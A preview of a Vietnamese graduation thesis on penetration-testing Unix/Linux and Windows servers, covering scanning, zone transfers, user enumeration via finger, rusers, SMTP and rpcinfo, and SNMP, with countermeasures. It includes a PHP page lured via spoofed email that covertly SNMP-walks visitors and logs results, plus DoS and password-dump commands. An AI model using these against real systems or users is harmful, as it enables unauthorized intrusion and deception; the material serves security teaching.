Đồ án tốt nghiệp đánh giá an toàn hệ thống máy chủ sử dụng unix linux

59 853 2
Đồ án tốt nghiệp đánh giá an toàn hệ thống máy chủ sử dụng unix linux

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Mô tả: Hệ thông Unix thường bị tấn công nhiều hơn hệ thống windows. Có nhiều lý do liên quan tới điều này như:+Mã nguồn mở: Unix là mã nguồn mở với nhiều lỗi đươc tìm thấy và được khai thác trong mã nguồn. Ngay khi lỗi được phát hiện thì các quản trị viên vá lỗi ngay lập tức.+Tính sẵn sang: Có nhiều GNU Linux và Unix kết nối tới mạng.Mục tiêu: +Thực hiện theo một cách tiếp cận có cấu trúc cho sự thâm nhập hệ thống Unix+Tăng truy cập ban đầu và sau đó tăng đặc quyền với hệ thống+Để vượt qua quyền root và tăng lây lan tấn công đối với hệ thống và các mức khác nhau.+Hiểu được các vấn đề an toàn Unix và các phương pháo bảo vệ.

1. Đánh giá an toàn hệ thống máy chủ sử dụng Unix/Linux Mô tả: Hệ thông Unix thường bị tấn công nhiều hơn hệ thống windows. Có nhiều lý do liên quan tới điều này như: + Mã nguồn mở: Unix là mã nguồn mở với nhiều lỗi đươc tìm thấy và được khai thác trong mã nguồn. Ngay khi lỗi được phát hiện thì các quản trị viên vá lỗi ngay lập tức. + Tính sẵn sang: Có nhiều GNU Linux và Unix kết nối tới mạng. Mục tiêu: + Thực hiện theo một cách tiếp cận có cấu trúc cho sự thâm nhập hệ thống Unix + Tăng truy cập ban đầu và sau đó tăng đặc quyền với hệ thống + Để vượt qua quyền root và tăng lây lan tấn công đối với hệ thống và các mức khác nhau. + Hiểu được các vấn đề an toàn Unix và các phương pháo bảo vệ. Kết quả: + Danh sách các máy chủ hoạt động + Quy trình đang chạy trên các máy chủ + Danh sách người sử dụng + Danh sách mạng, các máy chủ và mối quan hệ giữa chúng + Phiên bản của nhân sử dụng trong các hệ điều hành + Nhà cung cấp hệ điều hành + Nhà cung cấp thứ ba và phần mềm bổ sung + Danh sách các máy chủ bị xâm nhập. 1.1. Phương pháp + Không có các phương thức thủ tục để đạt được quyền truy cập root vào hệ thống. Tuy nhiên các lỗ hổng tồn tại cho phép truy cập root từ xa một cách đơn giản. Dù sao nếu một hệ thống có lỗ hổng, nó sẽ dễ dàng phát hiện. tuy nhiên một kẻ tấn công sẽ cố gắng vượt qua thông qua các phương tiện khác, hoặc lỗ hổng, và công việc của chúng ta là cố gắng bảo vệ mạng đầy đủ. Không chỉ nó là lỗ hổng truy cập từ xa. + Tuy nhiên, chúng ta có thể cung cấp những ý kiến có bản hoặc hướng dẫn cho bạn như sau: + Xác định máy chủ hoạt động + Xác định các cổng và các dịch vụ + Liệt kê các thủ tục a. Xác định người sử dụng b. Xác định tài khoản e-Mail c. Xác định các quản trị viên d. Xác định mạng và tên miền + Kiểm tra giao thức thông thường + Kiểm tra hệ điều hành Unix + Tấn công từ xa a. Tấn công mật khẩu b. Tấn công từ chối dịch vụ c. Tấn công RPC d. Tấn công tràn bộ đệm e. Tấn công tràn heap f. Tấn công tràn số nguyên g. Tấn công định dạng chuỗi h. Tấn công dịch vụ web i. Tấn công thư điện tử j. Tấn công chia sẻ NFS + Tấn công theo vùng miền a. Tấn công theo quyền truy cập tập tin và thư mục b. Tấn công theo liên kết tượng trưng c. Tấn công theo điều kiện d. Tấn công hệ thống cuộc gọi e. Tấn công key logger f. Khởi động từ hệ điều hành khác 1.2. Xác định hoạt động máy chủ + Có khả năng lập bản đồ mạng lưới chung và riêng, sẽ cung cấp với các yếu tố cơ bản để bắt đầu một cuộc tấn công đầy đủ, và có tổ chức. Một trong những điều cần thiết để phân chia giữa các máy chủ, máy tính để bàn và các thiết bị ( như thiết bị định tuyến, chuyển mạch, máy in,….). Luôn luôn là quan trọng cần nhớ rằng chúng ta phải thiết lập mục tiêu và sử dụng nguôn lực thông tin được tìm thấy trong cách thực hiện. Phương pháp tiếp cận khác nhau để máy chủ hoạt động, chúng ta sử dụng quét qua ( cung cấp các thông tin trên nhiều máy chủ được sử dụng) và hoạt động quét. + Hoạt động quét: Cụ thể “Active” biểu thị hành động đó, khi thực hiện, làm cho mục tiêu nhận được các gói dữ liệu được tạo ra trực tiếp hoặc gián tiếp. Hoạt động quét là chúng ta sử dụng công cụ NMap để quét một loạt các địa chỉ IP với các phương pháp quét khac nhau. Bạn có thể biết địa chỉ IP hoặc tên máy cho mục tiêu của mình. Chúng ta có thể sử dụng tên máy hay nslookup để tìm máy chủ bổ sung trong mạng. Target: somesite.dom Nslookup -type=NS somesite.dom sẽ cung cấp với bản ghi NS cho somesite.dom. Bản ghi NS nói cho chúng ta biết địa chỉ của tên máy chủ somesite.dom sử dụng lưu trữ thông tin DNS. Trong trường hợp nhận được ns1.provider.net và ns2.provider.net là tên máy chủ, chúng ta cần có được địa chỉ IP của chúng. Vì vậy chúng ta có thể chuyển vùng(AXFR) dựa trên tên máy chủ, có thẩm quyền cho somesite.dom, và có được một danh sách của tất cả các bản ghi DNS của somesite.dom: Nslookup –type=A ns1.provider.net Chúng ta có địa chỉ ip của ns1.provider.net. Để sử dụng lệnh trên máy chủ để chuyển đổi AXFR: host -l somesite.dom IP_OF_NS1_PROVIDER_NET Nếu các tên máy chủ và tường lửa đều lỗi( có nghĩa là không có kiểm soát truy cập quy định cho di chuyển vùng được thiết lập trên các máy chủ và không có quy định phù hợp được thiết lập trên tường lửa cho việc lọc cổng 53/tcp, là được sử dụng để di chuyển vùng). Hoạt động có thể được lặp đi lặp lại và kết quả được lưu trên các tập tin. Bằng cách này mà chúng ta có thể bổ sung, khám phá ra nếu người quản lý máy chủ có một dự phòng, thích hợp, thiết lập tên máy chủ. Đó là một ý tưởng hay để cố gắng khám phá các quản trị viên hệ thống những gì tốt. theo cách này, chúng ta có thể lập kết hoạch cho các cuộc tấn công. Mặt khác, một tình trạng khá điển hình là một doanh nghiệp thường thuê hơn một địa chỉ IP công cộng, và thông thường, nhà cung cấp dịch vụ giao một khối( theo kỹ thuật thì một mạng con với 24 hoặc ít hơn) ví dụ, nếu bạn có một trang web công ty tại www.somesite.dom, và nó tương ứng với một IP chung đia chỉ x.y.z.204, thì bạn có thể traceroute tới nó, xem đó là bước trước. Nếu nó là từ một mạng con, thì nó bao gồm router và firewall. Dùng nmap để quét hệ điều hành. Ngoài ra sự khác biệt giữa địa chỉ IP của máy chủ web và các router có thể cung cấp một ý tưởng lớn. Như thường thấy máy chủ hoạt động đôi khi chồng chéo lên nhau với việc xác định các cổng và các dịch vụ. + Quét thụ động: Trong cùng một switch hoặc hub bạn có thể sử dụng kỹ thuật quét thụ động, nơi mà không có gói tin được gửi đến mạng, nhưng bộ chuyển đổi mạng của bạn, kết hợp với sniffer giống với ettercap, do đó cho thấy các địa chỉ IP được tìm thấy và tùy chọn hệ điều hành. 1.3. Xác định cổng và dịch vụ Chúng ta biết SMTP chạy trên công 25, SSH chạy trên cổng 22, HTTP chạy trên cổng 80. Tuy nhiên một số quản trị viên, bảo mật thông qua cách tiếp cận không tốt,đó là lý do tại sao mà nó thường là quan trọng đối với cổng quét qua hai giai đoạn: Đầu tiên: Tìm kiếm các cổng phổ biến, ví dụ, sử dụng nmap. Nếu chúng ta tìm thấy hoặc cảm giác nhiều dịch vụ có thể đang chạy. Thứ hai: Chúng ta có thể bắt đầu quét một giây để xác định bản đồ phạm vi cổng(tcp và udp), từ 1 tới 65535.Nmap –sV dich vụ phát hiện trên toàn cổng không chuẩn, và sẽ cung cấp một phần của byte đọc từ kết nối khi nó không thể xác định dịch vụ đang chạy trên nó. Nmap –T cho phép làm chậm một máy quét. Tất nhiên nó sẽ mất nhiều thời gian để kết thúc. Ngoài rat hang số -f, sử dụng phân mảnh gói tin trong quá trình quét. Các khía cạnh quan trọng từ cổng và dịch vụ quét liên quan tới kiến thức của người quản trị hệ thống . 1.4. Tấn công liệt kê + Tấn công liệt kê được sử dụng lấy thông tin từ dịch vụ liên quan. Ví dụ, từ NetBIOS chúng ta có thể lấy chia sẻ, tên máy tính, tên dịch vụ, hệ điều hành liên quan, ….Chúng ta có thể nhận được tên người dùng và bao lâu và bao nhiêu làm việc trên hệ thống. Chúng ta sẽ cung cấp các ví dụ của các kiêu liệt kê khác nhau. 1.4.1. Xác định người sử dụng Mục tiêu: Để đưa ra lợi thế của lỗi cấu hình trên các dịch vụ hoặc giao thức khác nhau để có được kiến thức sâu sắc hơn về cơ sở người dùng. Nhiều lần GNU+ Linux dựa trên các hộp cài đặt như tường lửa, máy chủ VPN hoặc gateway, do đó người dùng cục bộ không được sử dụng nhiều. Kết quả Tên người sử dụng, địa chỉ hòm thư, thời gian đăng nhập/đăng xuất, các tập tin kế hoạch, shell mặc định. Tiến trình Finger Rwho Ruser SMTP 1.4.1.1. Xác định người sử dụng: Finger + Dịch vụ finger trình bày hệ thống thông tin người sử dụng đối với bất kỳ thực thể nào trên mạng. Finger làm việc trên cổng 79 TCP/UDP. + Giúp kể tấn công phỏng đoán tài khoản người sử dụng + Giúp kẻ tấn công phỏng đoán hệ thống hệ điều hành + Lựa chọn: #finger –l @target.com #finger –l root@target.com #finger –l ‘abcdefgh’@target.com + Kết quả: #finger root@target.com Login: root Name: root Directory: /root Shell: /bin/bash On since Mon Oct 13 22:06 (IST) on tty1 54 seconds idle On since Mon Oct 13 23:53 (IST) on tty2 17 minutes 4 seconds idle On since Mon Oct 13 23:39 (IST) on tty3 4 hours 56 minutes idle On since Mon Oct 13 23:39 (IST) on tty4 4 hours 56 minutes idle On since Mon Oct 13 22:06 (IST) on :0 (messages off) On since Mon Oct 13 22:34 (IST) on pts/0 from :0.0 50 minutes 6 seconds idle On since Tue Oct 14 04:20 (IST) on pts/2 from 203.124.156.112 30 minutes 15 seconds idle On since Tue Oct 14 00:46 (IST) on pts/5 from :0.0 1 hour 7 minutes idle Mail last read Tue Oct 14 04:04 2003 (IST) No Plan # finger @target.com Login: broot Name: Mr. Root Directory: /root Shell: /bin/bash Last login Wed Jan 30 09:43 2002 (CET) on console No Plan. Login: nonroot Name: Non-root root user for NFS Directory: /nonexistent Shell: nologin Never logged in. No Plan. Login: root Name: Mr. Root Directory: /root Shell: /bin/sh Last login Wed Jan 30 09:43 2002 (CET) on console No Plan. # finger 'a b c d e f g h'@www. sun-target.com + Những biện pháp đối phó Xinetd/tcp wrapper sử dụng để kiểm soát truy cập dịch vụ như sau: + Host/ip + Người dùng + Nhóm người dùng + Thời gian truy cập + Khuyến khich mạnh mẽ để chặn các cổng trên router/firewall + Vô hiệu hóa các dịch vụ nếu không được sử dụng từ tập tin cấu hình /etc/inetd.conf và khởi động lại tiến trình + Vô hiệu hóa các dịch vụ nếu không được sử dụng từ /etc/xinetd.conf và khởi động lại tiến trình xinetd. + Chạy dịch vụ trên các cổng phi tiêu chuẩn /etc/services. Máy khách cần chạy các dịch vụ trên cùng một cổng như máy chủ. + Cho phép truy cập dựa trên giao diện cụ thể sử dụng xinetd/tcp wrapper hoặc bất kỳ tường lửa nào(iptables). 1.4.1.2. Xác định người sử dụng: RWHO Mô tả Điều này tương tự như finger. Tấn công chỉ dành cho các phân đoạn khu vực. nó là kết nối từ xa. Đó là sự kết hợp thông tin từ toàn bộ hệ thống trong một mạng cục bộ đang chạy rwho. Nó hoạt động trên udp cổng 513. Các bước thực hiện #rwho -a wally becky smith Ví dụ / kết quả #rwho -a wally becky smith becky cygnus:pts0 Jan 17 11:20 :12 smith aquila:ttyp0 Jan 15 09:52 :22 wally lyra:pts7 Jan 17 13:15 1:32 wally lyra:pts8 Jan 17 14:15 1:01 Phân tích / kết luận / quan sát Như bạn có thể nhìn thấy Wally Becky và smith trực tuyến và Wally là nhàn rỗi hơn một giờ. Đây là những chi tiết chúng ta có thể sử dụng để kiểm tra người xem và người hoạt động. Biện pháp đối phó + Vô hiệu hóa các dịch vụ rwho nếu không được sử dụng /etc/inetd.conf và khởi động lại tiến trình inetd. + Sử dụng xinetd/tcpwarppers để kiểm soát các dịch vụ truy cập như sau: + Host/IP + người sử dụng + nhóm người sử dụng + thời gian truy cập + Yêu cầu ngăn chặn các cổng trên router/firewall. + Vô hiệu hóa các dịch vụ nếu không được sử dụng /etc/xinetd.conf(hoặc loại bỏ tệp tin finger từ xinetd.d) và khởi động lại quá trình xinetd + Chạy dịch vụ trên các cổng phi tiêu chuẩn /etc/services. Máy khách cần chạy các dịch vụ trên cùng một cổng như máy chủ. + Cho phép truy cập dựa trên giao diện cụ thể sử dụng xinetd/tcp wrapper hoặc bất kỳ tường lửa nào(iptables). 1.4.1.3. Xác định người sử dụng: RUSER Mô tả Điều này là tương tự như đối với những người mà duy nhất của mạng lưới địa phương. Nó được sử dụng để cung cấp thông tin về người hiện đang đăng nhập vào hệ thống trong mạng nội bộ. Hoạt động trên udp cổng 513 Từng bước thực hiện #rusers –a <target IP> • #rusers -l <target IP> Ví dụ/ Kết quả #rusers –a <target IP> [root@localhost root]# rusers -a 192.168.0.60 192.168.0.60 root root root root gaurav Phân tích/kết luận/ quan sát Điều này sẽ đến với tên người dùng với các máy tương ứng, và tên máy chủ thậm chí nếu không có ai là loggd trên chúng. Tên máy chủ thường hữu ích để vẽ sơ đồ mạng. Tên người dùng bình thường đi kèm tiện dụng trong khi cố gắng truy cập. Ví dụ / kết quả #rusers -l <target> [root@localhost root]# rusers -l 192.168.0.60 root 192.168.0.60:tty1 May 11 22:02 :01 root 192.168.0.60:pts/0 May 12 02:00 :01 (192.168.0.100) root 192.168.0.60:pts/1 May 12 00:35 :16 (192.168.0.1) root 192.168.0.60:pts/2 May 12 01:39 :15 (192.168.0.70) gaurav 192.168.0.60:pts/3 May 12 01:41 (192.168.0.1) Biện pháp đối phó Vô hiệu hóa dịch vụ nếu không cần thiết sử dụng + Vô hiệu hóa các dịch vụ rusers nếu không sử dụng /etc/inetd.conf và khởi động lại tiến trình. + Sử dụng xinetd/tcpwarppers để kiểm soát các dịch vụ truy cập như sau: + Host/IP + người sử dụng + nhóm người sử dụng + thời gian truy cập + Yêu cầu ngăn chặn các cổng trên router/firewall. + Vô hiệu hóa các dịch vụ nếu không được sử dụng /etc/xinetd.conf(hoặc loại bỏ tệp tin finger từ xinetd.d) và khởi động lại quá trình xinetd + Chạy dịch vụ trên các cổng phi tiêu chuẩn /etc/services. Máy khách cần chạy các dịch vụ trên cùng một cổng như máy chủ. + Cho phép truy cập dựa trên giao diện cụ thể sử dụng xinetd/tcp wrapper hoặc bất kỳ tường lửa nào(iptables). 1.4.1.4. Xác định người sử dụng: SMTP Dịch vụ giao thức truyền nhận thư điện tử đơn giản làm việc trên cổng 25 và có hỗ trợ VRFY, EXPN, ESMTP, HELP, và/hoặc EHLO Các lệnh EXPN và VRFY có thể được sử dụng liệt kê người dùng Lệnh EXPN: Một tấn công từ xa có thể sử dụng lệnh EXPN để tìm thư điện tử. Có thể tìm thấy tên người sử dụng cái mà được gắn vào tài khoản người quản trị trên thư điện tử. Lệnh VRFY: Một tấn công từ xa có thể được sử dụng lệnh EXPN để tìm thư điện tử. Có thể tìm tên người sử dụng mà là ánh xạ tới các tài khoản quản trị trên máy chủ thư điện tử. Từng bước thực hiện telnet <target> 25 • vrfy $user Ví dụ / Kết quả "telnet target 25". vrfy user Kết quả được đưa ra như sau 250 kartikeya puri <user@target> expn all 250-someone somewhere <user@target1> 250-another guy <root@target1> 250-yetanotehr guy <guest@target2> 250-real babe babe@babevilla Phân tích/ kết luận/ quan sát Bất kỳ lần nào người sử dụng giữ mật khẩu như một sự kết hợp của tên đầy đủ của họ. Thông tin này có thể được sử dụng cho các cuộc tấn công kỹ thuật xã hội tốt. Một lệnh expn. Nó tương tự như lệnh vrfy, ngoại trừ trong trường hợp của một danh sách gửi thư, hoặc danh sách mở rộng, nó sẽ hiển thị tất cả các thành viên của danh sách đó. Lệnh SMTP expn bắt nguồn từ MTA để mở rộng ( hiển thị tất cả những người nhận) của một địa chỉ. Để minh họa rủi ro, xem xét nhiều trang web có bí danh mà bao gồm tất cả hoặc một bộ phận lớn người sử dụng. Tên bí danh như vậy thường có thể dễ dàng đoán, chẳng hạn như tất cả( như được sử dụng trong ví dụ trên), tất cả mọi người, người sử dụng hoặc nhân viên. Một thăm dò đơn giản để tất cả đưa ra danh sách của người sử dụng theo bí danh đó. 1.4.1.5. Xác định người sử dụng:RPCINFO Mô tả Máy chủ từ xa và chúng ta không biết tên người dùng như các phương thức đã thất bại trước. Trong suốt quá trình điều tra chúng ta đi đến thực tế rằng máy chủ là chạy portmap. Không thể tốt đẹp nếu chúng ta không biết tên của chuong trình chạy, do đó chúng ta có thể cố gắng khai thác những dịch vụ và sẽ không cần phải chờ đợi cho việc crack tên người dùng và mật khẩu. Tất cả chúng ta cần phải làm là thăm dò các mục tiều cho thông tin rpc. Từng bước thực hiện #rpcinfo -p target Ví dụ / kết quả -1 #rpcinfo -p target program vers proto port 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100232 10 udp 32772 sadmind 100221 1 tcp 32772 100068 2 udp 32773 100068 3 udp 32773 100068 4 udp 32773 100068 5 udp 32773 300326 4 tcp 32773 100249 1 udp 32778 100249 1 tcp 32779 300598 1 udp 32781 300598 1 tcp 32780 805306368 1 udp 32781 805306368 1 tcp 32780 Phân tích/ kết luận/ quan sát Điều này sẽ thăm dò dịch vụ portmap trên các máy chủ sử dụng phiên bản 2 của giao thức portmap và hiển thị danh sách của tất cả được đăng ký chương trình RPC. Nên nhớ rằng NFS chạy trên RPC. Nếu quá trình RPC được liệt kê, showmount –e $target có thể thăm dò hưu ích. Biện pháp đối phó Hạn chế truy cập từ tường lửa/router, hoặc vị trí bất kỳ không cần thiết. Dừng dịch vụ portmap nếu RPC không được sử dụng. Nên nhớ các chương trình quan trọng sau sử dụng RPC: NFS, NIS, Wall, rstatd, r services. 1.5. Kiểm tra giao thức phổ biến SNMP TFTP FTP SMTP HTTP NNTP Telnet Các giao thức sử dụng tầng 2. 1.5.1. Kiểm tra dịch vụ SNMP Mô tả Quản lý giao thức mạng đơn giản. Lợi ích cho các quản trị viên người mà cần quản lý giao thức mạng và biết cách sử dụng. SNMP sử dụng tên nhóm, có hai kiểu, một là công cộng, một là quyền riêng biệt. Cả hai nhóm có quyền đọc và ghi. Theo mặc định các chuỗi nhóm snmp trong một vài máy chủ là “private” và “public”. Ảnh hưởng đến SNMP các chuỗi tạo ra một vết lõm lớn trong tất cả về an ninh. Dự đoán một chuỗi với các đặc quyền tương tự như một nhóm được gom lại. Nó có thể được sử dụng để xác định hoạt động hệ thống, người dùng/ chia sẻ, thời gian, tên hệ thống, dịch vụ, thay đổi cấu hình thiết bị như ( thiết bị định tuyến router, tường lửa,vv…)\ Mục tiêu Để biết chi tiết cấu hình và viết truy cập đến các thiết bị. Dự kiến kết quả Phụ thuộc vào loại thiết bị Điều kiện tiên quyết Dịch vụ SNMP được chạy trên máy tính mục tiêu. Quá trình Xác định các chuỗi SNMP trên mục tiêu. Gán giá trị MIB bằng SNMP walking và pilfer cho thông tin Thỏa hiệp hệ thống. 1.5.1.1. Xác định các chuỗi SNMP Mô tả Điều này có thể đạt được theo hai cách: 1.Dự đoán chuỗi sở hữu chung 2. chuỗi nhóm Bruteforce 3. Hệ điều hành quét thiết bị, cố gắng khám phá nhà cung cấp và sử dụng mặc định danh sách mật khẩu. 4. Thăm dò 1.5.1.2. Lấy giá trị MIB bằng SNMP walking và pilfer dành cho thông tin 17. Xác định hệ thống hệ điều hành 18. Xác định thời gian máy chủ 19. Xác định quy trình / dịch vụ 20. Xác định chia sẻ thông tin 21. Xác định người sử dụng Chức năng PHP dành cho SNMP walk Mô tả PHP có chức năng sẵn có để thực hiện SNMP walking. Các định dạng cho chức năng snmpwalk là một mảng snmpwalk (chuỗi tên máy chủ, chuỗi nhóm người sử dụng, chuỗi object_id, thời gian chờ) Snipet từ tài liệu PHP dành cho snmpwalk “ trả về một mảng của các đối tượng SNMP giá trị bắt đầu từ object_id như quyền root và FALSE về lỗi”. Chức năng snmpwalk được sử dụng để đọc tất cả các giá trị từ một tác nhân SNMP theo quy định của tên máy chủ. Một nhóm quy địn cụ thể các nhóm đọc cho các tác nhân. Một đối tượng là NULL được thwucj hiện như là quyền root của đối tượng cây SNMP và toàn bộ các đối tượng con của cây đó được trả về như là một mảng. Nếu object_id được quy định cụ thể, tất cả các đối tượng SNMP dưới đây object_id được trả về. Điều kiện tiên quyết Một trong những điều cần phải biết những tên cộng đồng. Nếu các tên mặc định cồng đồng “riêng tư” và “công cộng” được kích hoạt, sau đó các mã sau đây sẽ làm việc tốt. Từng bước thực hiện 1.Thay đổi tên chuỗi riêng tư hoặc công cộng nếu cần 2. Trang máy chủ trên web-server với hỗ trợ PHP4 3. Đánh lừa người sử dụng vào sử dụng trang này.( Một thư điện tử giả mạo có thể được sử dụng) 4. Tải xuống data.txt để đọc kết quả <?php ip = getip(); // Getting the ip of target machine $filename = "data.txt"; // this file needs to reside on server $useragent = $_SERVER['HTTP_USER_AGENT']; // capturing the browser name (for OS guessing) $date = date("F j, Y, g:i a"); // to keep track of who visited the page when $fh = fopen($filename, "a") or die("Internal error"); $a = snmpwalk('$ip', "public", "") or die("Internal Error"); $b = snmpwalk('$ip', "private","") or die("Internal Error"); for ($i=0; $i < count($a); $i++) { echo $a[$i]; $data = $ip . "|" . $useragent . "|" . $date . "|" . $a[i] . "\n"; fwrite($fh , $data) or die("Internal Error"); } for ($i=0; $i < count($b); $i++) { echo $b[$i]; $data = $ip . "|" . $useragent . "|" . $date . "|" . $b[i] . "\n"; fwrite($fh , $data) or die ("Internal Error"); } fclose($fh); echo "This page is down for maintainence"; //the following function will get machines ip, depending upon the settings. Thanks Shaolin Tiger for help with this bit. [...]... trình kiểm tra Sử dụng các tiện ích theo dõi hệ thống để phát hiện các tiến trình, chương trình lạ đang thực thi trong hệ thống Công cụ kiểm tra + Keylogger Killer + Spyblaster + Spybot S&D 1.6.16 Đánh giá an toàn vật lý Mô tả Đây là cách thức kiểm tra mức độ an toàn ở mức vật lý của hệ thống Mục đích kiểm tra Nhằm đảm bảo an toàn ở mức vật lý cho hệ thống Quy trình kiểm tra + Kiểm tra an toàn cho các... Loader) 2 Đánh giá an toàn hệ thống máy chủ window 2.4 Mô tả Để hiểu việc thực hiện an toàn, chúng ta sẽ phải hiểu vài thuật ngữ sau: Điều hành: Điều hành là một phần của hệ thống thực hiện trong chế độ nhân, và được chia thành ba cấp độ Mức thấp nhất được gọi là HAL, cung cấp một bản tóm tắt quan điểm kiến trúc máy tính cơ bản Động cơ lớp này làm cho hệ thống di động Bảo vệ hệ thống con: Một hệ thống. .. ứng dụng (API) Hệ thống con được bảo vệ đôi khi được gọi là máy chủ, hoặc bảo vệ máy chủ, và được thực hiện trong chế độ người dùng như các quá trình với một số các đặc quyền Khi một ứng dụng gọi API, một tin nhắn được chuyển đến máy chủ thực hiện các các tiện ích API thông qua các thiết bị LPC Sau đó, máy chủ trả lời gửi một tin nhắn lại cho người gọi Hệ thống máy tính (TCB) máy chủ được bảo vệ máy chủ, ... và sử dụng công cụ của chúng 2.6 Mục tiêu + Hiểu biết về các vấn đề bảo mật windows + Tiếp cận có cấu trúc cho sự thâm nhập hệ thống Windows/ kiểm toán + Đạt được truy cập và các điều khoản đặc quyề + Ngoài ra sự lan rộng các cuộc tấn công hơn nữa 2.7 Dự kiến kết quả + Danh sách các máy chủ trực tiếp + Quy trình chạy trên máy + Danh sách người dụng/ chia sẻ + Phiên bản nhân sử dụng trong hệ thống hệ. .. đăng ký + Danh sách NETBIOS + Danh sách tên Netbios + Danh sách phiên Netbios + Danh sách MIB + SNMPwalk + SNMPget b Xác định các trình duyệt chủ c d e f Xác định các tên miền trên mạng Xác định tên miền điều khiển Xác định tên miền máy chủ Xem tên miền thành viên 2.9.1 Xác định người sử dụng Mô tả Nếu các máy tính mục tiêu là một danh sách người sử dụng DC sẽ là danh sách người sử dụng toàn bộ miền,... server chạy các ứng dụng web không được cấu hình an toàn thì sẽ xuất hiện các nguy cơ về bảo mật Vì vậy quá trình cấu hình, cài đặt một hệ thống máy chủ chạy ứng dụng web đảm bảo đúng các yêu cầu về an toàn là cần thiết Mục đích kiểm tra Nhằm kiểm tra mức độ bảo mật của ứng dụng Web Quy trình kiểm tra Sử dụng các công cụ quét toàn diện hệ thống website Sử dụng các khuôn dạng (framework) có sẵn để tiến... quản lý máy tính để bàn Winlogon đăng ký chính nó với Win32, trong quá trình khởi tạo hệ thống là quá trình đăng nhập Win32: là hệ thống windows API 32 bít có sẵn các chương trình ứng dụng Ngoài ra nó cung cấp giao diện người dùng đồ họa và điều khiển tất cả các đầu vào người sử dụng và đầu ra Chỉ có hai đối tượng được xuất ra từ máy chủ này, máy trạm window, tức là người sử dụng đầu vào/đầu ra hệ thống( chuột,... tích/ kết luận/ quan sát Pwdump là một cách tốt nhất để kiểm tra hệ thống mật khẩu yếu trên hệ thống Công cụ pwdumpX Biện pháp đối phó + lưu trữ cơ sở dữ liệu SAM trên một phương tiện truyền thông an toàn có thể được sử dụng tại thời điểm khởi động hệ thống + Cài đặt Syskey 2.12.18 Vượt qua xác thực bằng khởi động từ một hệ điều hành thay thế Mô tả Kẻ tấn công khởi động hệ thống từ một hệ điều hành thay... trên các hệ thống có bị tấn công Land và LaTierra hay không? Quy trình kiểm tra + Kiểm tra Land: + Chạy Land với hệ thống đích #land 172.16.0.16 139 + Kiểm tra LaTierra: + Chạy LaTierra với hệ thống đích #latierra -i 172.16.0.16 -b 139 Công cụ kiểm tra + Land + LaTierra 2.12.13 Mô tả Tấn công GetAdmin GetAdmin là một công cụ được sử dụng để bỗ sung thêm người dùng vào nhóm adminstrator Nó sử dụng lỗi... quan sát Kẻ tấn công có thể có được tất cả các bộ điều khiển tên miền, có thể sử dụng dữ liệu hợp lý hơn Biện pháp đối phó Hạn chế truy cập cổng 135-139 và 445 2.10 Sơ đồ mạng 2.10.1 Xác định máy chủ trực tiếp Mô tả Bạn có thể xác định máy chủ trực tiếp trên mạng Mỗi máy chủ trực tiếp có thể trở thành mục tiêu tiềm năng Từng bước thực hiện Ping quét toàn bộ gói tin Ví dụ/ kết quả Sử dụng pingger Sử dụng . 1. Đánh giá an toàn hệ thống máy chủ sử dụng Unix/Linux Mô tả: Hệ thông Unix thường bị tấn công nhiều hơn hệ thống windows. Có nhiều lý do liên quan tới điều này như: + Mã. các máy chủ hoạt động + Quy trình đang chạy trên các máy chủ + Danh sách người sử dụng + Danh sách mạng, các máy chủ và mối quan hệ giữa chúng + Phiên bản của nhân sử dụng trong các hệ điều hành. hoặc công cộng nếu cần 2. Trang máy chủ trên web-server với hỗ trợ PHP4 3. Đánh lừa người sử dụng vào sử dụng trang này.( Một thư điện tử giả mạo có thể được sử dụng) 4. Tải xuống data.txt để

Ngày đăng: 09/07/2014, 15:03

Từ khóa liên quan

Mục lục

  • Mô tả

  • Mục đích kiểm tra

  • Quy trình kiểm tra

  • Công cụ kiểm tra

  • Mô tả

  • Mục đích kiểm tra

  • Quy trình kiểm tra

  • Công cụ kiểm tra

  • Mô tả

  • Mục đích kiểm tra

  • Quy trình kiểm tra

  • Mô tả

  • Mục đích kiểm tra

  • Quy trình kiểm tra

  • Mô tả

  • Mục đích kiểm tra

  • Quy trình kiểm tra

  • Công cụ kiểm tra

  • Mô tả

  • Mục đích kiểm tra

Tài liệu cùng người dùng

Tài liệu liên quan